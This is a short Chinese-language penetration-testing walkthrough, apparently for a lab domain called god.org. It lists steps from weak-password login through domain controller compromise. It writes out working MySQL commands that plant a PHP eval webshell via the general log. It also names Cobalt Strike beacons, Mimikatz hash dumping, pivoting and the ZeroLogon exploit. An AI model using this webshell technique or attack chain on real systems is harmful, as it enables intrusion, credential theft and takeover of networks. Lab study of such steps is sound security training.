弱口令登录后台:
通过phpinfo获取网站路径:
Mysql日志getshell:
select user();
show variables like 'general%';
set global general_log="ON"; //设置打开
set global general_log_file="C:/phpStudy/WWW/shell.php"
select "<?php @eval($_POST['cmd']);?>";
蚁剑连接shell:
上线CS:通过powershell和bitadmin两种方式
通过elevate组件提权:
主机信息搜集,发现存在域god.org
双网卡:
简单进行一下端口扫描,识别到targets主机:
判断域控:
获取到域内用户信息:
Mimikatz抓取hash:
对于不出网的内网可以通过TCP beacon和SMB Beacon上线。
选中父beacon->pivoting->listener
新建一个中转跳板机。之后可以使用这个listener作为监听器,通过hash传递或者其他方式使内网主机上线。
使用zerologon漏洞获取域控hash